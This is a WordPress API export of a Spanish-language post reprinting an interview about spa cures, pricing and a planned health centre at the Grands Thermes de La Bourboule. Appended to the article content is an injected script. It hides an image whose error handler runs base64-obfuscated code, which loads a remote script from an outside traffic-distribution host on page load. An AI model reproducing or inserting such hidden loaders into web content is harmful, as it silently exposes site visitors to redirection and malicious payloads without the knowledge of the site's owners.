{"id":6612,"date":"2023-04-10T19:41:54","date_gmt":"2023-04-10T22:41:54","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=6612"},"modified":"2025-08-13T16:02:25","modified_gmt":"2025-08-13T19:02:25","slug":"grands-thermes-de-la-bourboule-la-cura-recovery-solo-costara-un-euro-para-los-acompanantes","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=6612","title":{"rendered":"Grands Thermes de La Bourboule: \u00abLa cura \u00abRecovery\u00bb solo costar\u00e1 un euro para los acompa\u00f1antes\u00bb"},"content":{"rendered":"\n<h4 class=\"has-pale-cyan-blue-background-color has-background wp-block-heading\"><strong><em>Soluciones para ayudar a los hu\u00e9spedes del spa a beneficiarse de los tratamientos termales a pesar de la inflaci\u00f3n, un proyecto de hogar de ancianos &#8230; Joffrey Chalaphy, director de las Grands Thermes de La Bourboule (Puy-de-D\u00f4me), ha confiado sus ambiciones para 2023 al personal editorial del Officiel du Thermalisme.<\/em><\/strong><\/h4>\n\n\n\n<h4 class=\"has-vivid-cyan-blue-color has-text-color wp-block-heading\"><strong>L&#8217;Officiel du Thermalisme: \u00bfCu\u00e1les son las particularidades de las Grands-Thermes de La Bourboule?<\/strong>\u00a0<\/h4>\n\n\n\n<p><strong>Joffrey Chalapy<\/strong>: Somos una de las \u00fanicas estaciones que cubre\u00a0<a href=\"https:\/\/www.officiel-thermalisme.com\/orientations_therap\/voies-respiratoires\/\" target=\"_blank\" rel=\"noopener\" title=\"\">orientaciones respiratorias<\/a>,\u00a0<a href=\"https:\/\/www.officiel-thermalisme.com\/orientations_therap\/cure-thermale-dermatologie\/\">dermatolog\u00eda<\/a>, trastornos\u00a0<a href=\"https:\/\/www.officiel-thermalisme.com\/orientations_therap\/affections-des-muqueuses-bucco-linguales\/\" target=\"_blank\" rel=\"noopener\" title=\"\">de la mucosa oral-lingual<\/a>\u00a0y\u00a0<a href=\"https:\/\/www.officiel-thermalisme.com\/orientations_therap\/troubles-du-developpement-enfant\/\" target=\"_blank\" rel=\"noopener\" title=\"\">trastornos del desarrollo en ni\u00f1os<\/a>,\u00a0sin reumatolog\u00eda. La otra gran particularidad es que, hist\u00f3ricamente,\u00a0<a href=\"https:\/\/www.officiel-thermalisme.com\/etablissements\/la-bourboule-3\/\" target=\"_blank\" rel=\"noopener\" title=\"\">La Bourboule<\/a>\u00a0es el sitio donde\u00a0m\u00e1s se ha desarrollado la\u00a0<strong>cura pedi\u00e1trica<\/strong>. Cada a\u00f1o, damos la bienvenida a entre 800 y 1.000 ni\u00f1os en tratamientos de spa.\u00a0<\/p>\n\n\n\n<h3 class=\"has-vivid-cyan-blue-color has-text-color wp-block-heading\"><strong>\u00bfQu\u00e9 les espera a sus hu\u00e9spedes del spa para la temporada termal 2023?<\/strong>\u00a0<\/h3>\n\n\n\n<p><a href=\"https:\/\/www.officiel-thermalisme.com\/2022\/11\/28\/grands-thermes-la-bourboule-renovation\/\" target=\"_blank\" rel=\"noopener\" title=\"\">Las renovaciones importantes<\/a>\u00a0han comenzado y continuar\u00e1n hasta abril de 2025. Algunos sitios de construcci\u00f3n se llevar\u00e1n a cabo mientras que los ba\u00f1os termales estar\u00e1n abiertos al p\u00fablico, por lo que pedimos un poco de indulgencia a nuestros hu\u00e9spedes del spa mientras aseguramos su buen acompa\u00f1amiento. Es por ellos que hacemos estos cambios, con el fin de mejorar sus\u00a0<strong>condiciones de acogida y v\u00edas de atenci\u00f3n<\/strong>.\u00a0<\/p>\n\n\n\n<p>Este a\u00f1o, tambi\u00e9n tuvimos en cuenta un problema social importante, a saber,&nbsp;<strong>el poder adquisitivo<\/strong>. Sabemos que muchas personas ciertamente tendr\u00e1n que renunciar a su cuidado por falta de medios. Para que no abandonen completamente la cura, proponemos, en lugar de una cura de tres semanas, venir y llevar a cabo&nbsp;<strong>una cura corta \u00abRecuperaci\u00f3n\u00bb.<\/strong>&nbsp;Y proponemos&nbsp;cobrar solo&nbsp;<strong>un euro al acompa\u00f1ante&nbsp;<\/strong>que desee realizar la misma cura.&nbsp;&nbsp;<\/p>\n\n\n\n<h3 class=\"has-vivid-cyan-blue-color has-text-color wp-block-heading\"><strong>\u00bfEste precio ser\u00e1 el mismo independientemente de la estancia sanitaria elegida?<\/strong>\u00a0<\/h3>\n\n\n\n<p>\u00a1As\u00ed es! Ofrecemos seis estancias diferentes.\u00a0Ya sea una cura de 6 o 12 d\u00edas, el acompa\u00f1ante paga solo un euro y realiza los mismos cuidados que la persona a la que acompa\u00f1a. La idea no es desalentar a las personas de venir para recibir tratamiento y tambi\u00e9n dirigirse a un nuevo paciente, animarlos\u00a0a\u00a0<strong>venir y descubrir qu\u00e9 es la medicina termal a un<\/strong>\u00a0precio bajo.<\/p>\n\n\n\n<h2 class=\"has-vivid-cyan-blue-color has-text-color wp-block-heading\"><strong>\u00bfC\u00f3mo ve el futuro de las Grands Thermes de La Bourboule?<\/strong>&nbsp;<\/h2>\n\n\n\n<p>Queremos dedicarnos a la diversificaci\u00f3n de la medicina termal. Es por eso que estamos creando un&nbsp;<strong>hogar de salud dentro de los ba\u00f1os termales<\/strong>.&nbsp;Su misi\u00f3n principal es ofrecer a nuestros pacientes continuidad&nbsp;<strong>de la atenci\u00f3n<\/strong>.&nbsp;Por ejemplo, un ni\u00f1o que asiste a sesiones de patolog\u00eda del habla y el lenguaje en casa podr\u00e1 encontrar un servicio de terapia del habla en el hogar de ancianos y as\u00ed continuar su cuidado durante el per\u00edodo en que llega a rehabilitaci\u00f3n.<\/p>\n\n\n\n<p>Tambi\u00e9n queremos desarrollar&nbsp;la&nbsp;<strong>atenci\u00f3n integral de los pacientes locales&nbsp;<\/strong>con la posibilidad, para los prescriptores de la residencia de ancianos, de confiar en la infraestructura del centro termal. Pienso, por ejemplo, en el deporte recetado que prestamos en los ba\u00f1os termales: los profesionales sanitarios podr\u00e1n prescribirlo a los habitantes del local para que vengan a practicarlo en el establecimiento termal.&nbsp;<\/p>\n\n\n\n<h2 class=\"has-vivid-cyan-blue-color has-text-color wp-block-heading\"><strong>\u00bfTienes alguna idea de cu\u00e1ndo se abrir\u00e1?<\/strong><\/h2>\n\n\n\n<p>El hogar de ancianos dar\u00e1 la bienvenida a sus primeros pacientes&nbsp;<strong>a partir de finales de 2025<\/strong>. La estructura reunir\u00e1 a m\u00e9dicos generales y termales, fisioterapeutas, un dietista, un terapeuta del habla, una enfermera certificada por el estado (IDE). Tambi\u00e9n estamos trabajando en convenios con el CHU para que los especialistas puedan venir y ofrecer permanencia en pediatr\u00eda, psiquiatr\u00eda infantil, cardiolog\u00eda, etc. Todo directamente en el hogar de ancianos y por lo tanto en los ba\u00f1os termales.&nbsp;<\/p>\n\n\n\n<p><strong>Fuente<\/strong>:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><em>Entrevista con Joffrey Chalaphy, director de las Grands Thermes de La Bourboule, 30 de marzo de 2023.\u00a0<\/em><\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.officiel-thermalisme.com\/2023\/03\/31\/grands-thermes-de-la-bourboule-cure-remise-en-sante-un-euro-accompagnant\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/www.officiel-thermalisme.com\/wp-content\/themes\/officielthermalisme\/img\/logo_thermalisme.png\" alt=\"\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Soluciones para ayudar a los hu\u00e9spedes del spa a beneficiarse de los tratamientos termales a pesar de la inflaci\u00f3n, un proyecto de hogar de ancianos &#8230; Joffrey Chalaphy, director de las Grands Thermes de La Bourboule (Puy-de-D\u00f4me), ha confiado sus ambiciones para 2023 al personal editorial del Officiel du Thermalisme. L&#8217;Officiel du Thermalisme: \u00bfCu\u00e1les son [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":6613,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[16,28,14],"tags":[],"class_list":["post-6612","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-medicina-termal","category-portales-de-servicios-e-informacion","category-turismo-salud"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6612","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6612"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6612\/revisions"}],"predecessor-version":[{"id":10432,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6612\/revisions\/10432"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/6613"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6612"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6612"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6612"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}